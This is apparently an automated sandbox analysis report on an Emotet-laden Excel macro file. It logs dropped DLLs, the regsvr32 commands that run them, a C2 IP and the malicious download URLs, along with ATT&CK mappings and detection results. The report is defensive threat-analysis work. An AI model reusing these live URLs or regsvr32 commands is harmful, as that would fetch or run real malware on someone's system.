
Code function: 3_2_10009530 FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,

3_2_10009530

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: qd_34768.xlsm	Initial sample: OLE zip file path = xl/worksheets/sheet4.xml
Source: qd_34768.xlsm	Initial sample: OLE zip file path = xl/worksheets/sheet5.xml
Source: qd_34768.xlsm	Initial sample: OLE zip file path = xl/worksheets/sheet6.xml
Source: qd_34768.xlsm	Initial sample: OLE zip file path = xl/media/image1.jpg
Source: qd_34768.xlsm	Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001B2B0 push eax; ret		3_2_1001B2DE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001A9E0 push eax; ret		3_2_1001A9FE

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_100657FF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

3_2_100657FF

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exe	File created: C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd (copy)	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\xewn.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd (copy)

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\xewn.dll

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\xewn.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1002B150 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC,	3_2_1002B150
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1002B900 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA,	3_2_1002B900
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000EA9B IsIconic,GetWindowPlacement,GetWindowRect,	3_2_1000EA9B

Source: C:\Windows\SysWOW64\regsvr32.exe

3_2_100657FF

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1916	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2264	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2916	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dll

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

API coverage: 3.1 %

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100492F7 FindFirstFileA,FindClose,	3_2_100492F7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100489BD __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	3_2_100489BD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_004168D2 FindFirstFileW,	5_2_004168D2

Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: regsvr32.exe, 00000004.00000002.470572841.00000000003C5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\SysWOW64\regsvr32.exe

3_2_100657FF

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_100011EF ??3@YAXPAX@Z,??3@YAXPAX@Z,GetProcessHeap,HeapFree,

3_2_100011EF

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10021DEA SetUnhandledExceptionFilter,		3_2_10021DEA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10021DFC SetUnhandledExceptionFilter,		3_2_10021DFC

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe

Network Connect: 68.183.94.239 80

Jump to behavior

Source: Yara match

File source: app.xml, type: SAMPLE

Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd"			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn"			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,	3_2_1002904C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoW,WideCharToMultiByte,	3_2_1002910F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,	3_2_10026143
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesA,	3_2_10026318
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesA,	3_2_100265A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesA,	3_2_100266B6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,	3_2_100268AA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,	3_2_10028F39
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,MultiByteToWideChar,	3_2_10028FF6

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_1001CE60 GetLocalTime,GetSystemTime,GetTimeZoneInformation,

3_2_1001CE60

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_10023F2F GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

3_2_10023F2F

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_10064D73 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA,

3_2_10064D73

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 5.2.regsvr32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.3c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.735740378.0000000000250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.469991014.0000000000180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.464483054.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	21 Scripting	Path Interception	111 Process Injection	1 Disable or Modify Tools	1 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	13 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	43 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	21 Scripting	Security Account Manager	26 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	Scheduled Transfer	22 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	131 Masquerading	LSA Secrets	11 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	111 Process Injection	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Regsvr32	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
qd_34768.xlsm	40%	ReversingLabs	Document-Excel.Trojan.Emotet

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.2.regsvr32.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.regsvr32.exe.250000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
4.2.regsvr32.exe.230000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.regsvr32.exe.1e0000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
3.2.regsvr32.exe.3c0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.regsvr32.exe.180000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File

Domains

Source	Detection	Scanner	Label	Link
eles-tech.com	10%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://eles-tech.com/css/KzMysMqFMs/	11%	Virustotal		Browse
http://eles-tech.com/css/KzMysMqFMs/	100%	Avira URL Cloud	malware
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnurar	100%	Avira URL Cloud	malware
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://68.183.94.239/	2%	Virustotal		Browse
https://68.183.94.239/	100%	Avira URL Cloud	malware
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnural	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
eles-tech.com	185.46.40.47	true	true	10%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://eles-tech.com/css/KzMysMqFMs/	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnurar	regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://crl.entrust.net/server1.crl0	regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.entrust.net0D	regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://68.183.94.239/	regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmp	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://ocsp.entrust.net03	regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnural	regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://secure.comodo.com/CPS0	regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
68.183.94.239	unknown	United States		14061	DIGITALOCEAN-ASNUS	true
185.46.40.47	eles-tech.com	Turkey		34984	TELLCOM-ASTR	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	601134
Start date and time:	2022-03-31 20:51:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	qd_34768.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSM@7/9@1/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 58.5% (good quality ratio 55.9%) Quality average: 81.3% Quality standard deviation: 26.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 82 Number of non-executed functions: 258
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:51:52	API Interceptor	584x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
68.183.94.239	http://gnnmuebles.com/repellatdoloremque/cvwYFFP9r74hzmKLN5sxcTH1PII/	Get hash	malicious	Browse
	http://ecesaray.com.tr/marina2013/EkOM4/	Get hash	malicious	Browse
	je9DRDK1h3.dll	Get hash	malicious	Browse
	2GOaRNQNUB.dll	Get hash	malicious	Browse
185.46.40.47	http://gnnmuebles.com/repellatdoloremque/cvwYFFP9r74hzmKLN5sxcTH1PII/	Get hash	malicious	Browse	eles-tech.com/css/KzMysMqFMs/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
eles-tech.com	http://gnnmuebles.com/repellatdoloremque/cvwYFFP9r74hzmKLN5sxcTH1PII/	Get hash	malicious	Browse	185.46.40.47
eles-tech.com	http://ecesaray.com.tr/marina2013/EkOM4/	Get hash	malicious	Browse	185.46.40.47

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	e621.exe	Get hash	malicious	Browse	64.225.91.73
	http://gnnmuebles.com/repellatdoloremque/cvwYFFP9r74hzmKLN5sxcTH1PII/	Get hash	malicious	Browse	68.183.94.239
	http://ecesaray.com.tr/marina2013/EkOM4/	Get hash	malicious	Browse	68.183.94.239
	Og93bCbGNf.dll	Get hash	malicious	Browse	68.183.93.250
	56ECCF6F20E0D7C0822430750484BEED51112899B79B7.exe	Get hash	malicious	Browse	206.189.100.203
	XZORXOZf1g.dll	Get hash	malicious	Browse	68.183.93.250
	IMxPAtghaG.dll	Get hash	malicious	Browse	68.183.93.250
	PiA1aqXIL6.dll	Get hash	malicious	Browse	68.183.93.250
	ZziLGC8ISR.dll	Get hash	malicious	Browse	68.183.93.250
	y9jo3W30ig.dll	Get hash	malicious	Browse	68.183.93.250
	je9DRDK1h3.dll	Get hash	malicious	Browse	68.183.94.239
	gu0hfOGDlCY4yCf.dll	Get hash	malicious	Browse	68.183.93.250
	UGXj2o0SH.dll	Get hash	malicious	Browse	68.183.93.250
	EkkJyJEqzpFm.dll	Get hash	malicious	Browse	68.183.93.250
	VloYvBX.dll	Get hash	malicious	Browse	68.183.93.250
	rWYUKfj5ykoV.dll	Get hash	malicious	Browse	68.183.93.250
	so 3103.xlsm	Get hash	malicious	Browse	68.183.93.250
	2GOaRNQNUB.dll	Get hash	malicious	Browse	68.183.94.239
	UIwUmbwgN7.dll	Get hash	malicious	Browse	68.183.93.250
	itO59o85G1.dll	Get hash	malicious	Browse	68.183.93.250
TELLCOM-ASTR	http://gnnmuebles.com/repellatdoloremque/cvwYFFP9r74hzmKLN5sxcTH1PII/	Get hash	malicious	Browse	185.46.40.47
	http://ecesaray.com.tr/marina2013/EkOM4/	Get hash	malicious	Browse	185.46.40.47
	KaNahIixDu	Get hash	malicious	Browse	92.44.77.89
	MS1iw8qlHB	Get hash	malicious	Browse	82.222.17.19
	DHBV37l1Gc	Get hash	malicious	Browse	213.153.202.54
	NHVcomkXSR	Get hash	malicious	Browse	84.51.17.42
	UTa2CkHVvV	Get hash	malicious	Browse	176.42.169.3
	YhPgCoo2ZW	Get hash	malicious	Browse	82.222.222.146
	0Px1cPJwE5	Get hash	malicious	Browse	213.74.159.80
	TpsEks5jla	Get hash	malicious	Browse	213.74.184.26
	TflzGymnV6	Get hash	malicious	Browse	185.51.112.7
	DMSq8Cv87A	Get hash	malicious	Browse	176.41.61.58
	mirror1.o	Get hash	malicious	Browse	176.234.224.234
	SVXXMPYe3S	Get hash	malicious	Browse	176.232.180.46
	wuININp85R	Get hash	malicious	Browse	176.40.58.251
	hEEbp0yZYM	Get hash	malicious	Browse	176.88.214.200
	V2GDLmx0OF	Get hash	malicious	Browse	195.142.4.37
	9q0CmF4WKA	Get hash	malicious	Browse	92.44.115.79
	arm7	Get hash	malicious	Browse	176.40.58.254
	Payment 456363728 document.vbs	Get hash	malicious	Browse	217.131.86.189

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	Microsoft Cabinet archive data, 60992 bytes, 1 file
Category:	dropped
Size (bytes):	60992
Entropy (8bit):	7.994637486921971
Encrypted:	true
SSDEEP:	1536:1ccLOuSwR3W8vM1pjd8MpGwIMESUnWWiidx34:1ccLm6W8vUBCMpGwIMEDnqe4
MD5:	637481DF32351129E60560D5A5C100B5
SHA1:	A46AEE6E5A4A4893FBA5806BCC14FC7FB3CE80AE
SHA-256:	1F1029D94CA4656A577D554CEDD79D447658F475AF08620084897A5523587052
SHA-512:	604BFD0A78A57DFDDD45872803501AD89491E37E89E0778B0F13644FA9164FF509955A57469DFDD65A05BBEDAF0ACB669F68430E84800D17EFE7D360A70569E3
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF....@.......,...................I.......]t........VT+V .authroot.stl.K.&.4..CK..<Tk...c_.d....A.K.....Y.f.]%.BJ$RHnT..i/.]...s.H..k....n.3.......S..9.s.....3H$M.%...h..qV.=M..].4.I.....V:F.h]......B`..,......D.0a....H.G..:...XF.F..MJ`.H. 7......._....lE..he.4\|.?....h...7..P~8.\|.,. .....#0+..o...g...}U2n............'.Dp.;..f..ljX.Dx..r<'.1RA3B0<..D.z...)D\|..8<..c..'XH..I,.Y..d.b.".A......cm_nVb[w..rDp.....y%.\|7...^.#.#[...3~3.g..CN......k;...C.`.C.iB.`-...\|.....y.(....]~`>... .p..q<..g..i...y..\|.....I...T8B.Ag#U......G.9+.x6..a.c.3...X.4E........N..:X.F...S...X...ku..O.J...)Z....PAk..%.+..n..z<.2.......w2c@.((*.J.dN...\!o@.........0..3.`.DU.3.%0.G...4Sv...5.T.?.......p..".........\|..j.4.H...g.(...^.....w.......\|...#..og)>..t.}.k.G\|.2K.5..ik.......0..~ ">......A...ku..d..Y..@D....YO.{.9..:)..L..=D..O...6.n....ui<..w.[O...P>..y.L....J......r.!.5.u.3..-`..r,aH.B <..t..8.c.{u.<'.3.........u.3..[W.....2...$..eAo.m...w...............g$m.`..

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	3.168531669823635
Encrypted:	false
SSDEEP:	6:kKHrN+SkQlPlEGYRMY9z+4KlDA3RUeAxf1:/EkPlE99SNxAhUekf1
MD5:	EC813D37860409533A6C19375D0E37AE
SHA1:	6248F61760CB0EE5E1501D698912F62FC0EEDAE5
SHA-256:	CDADF7322EABCBD0750E90ABE538897D0190DFD78450BBC259777DB7A754B488
SHA-512:	DF6C6EFFACB11F4243B3BBCE349D9216D98E4276F4D0F05B0A729F36B507449E3500CB6FB32CF811701B19A9D3E75693C450FA20A1E27C8559110BBD72B68771
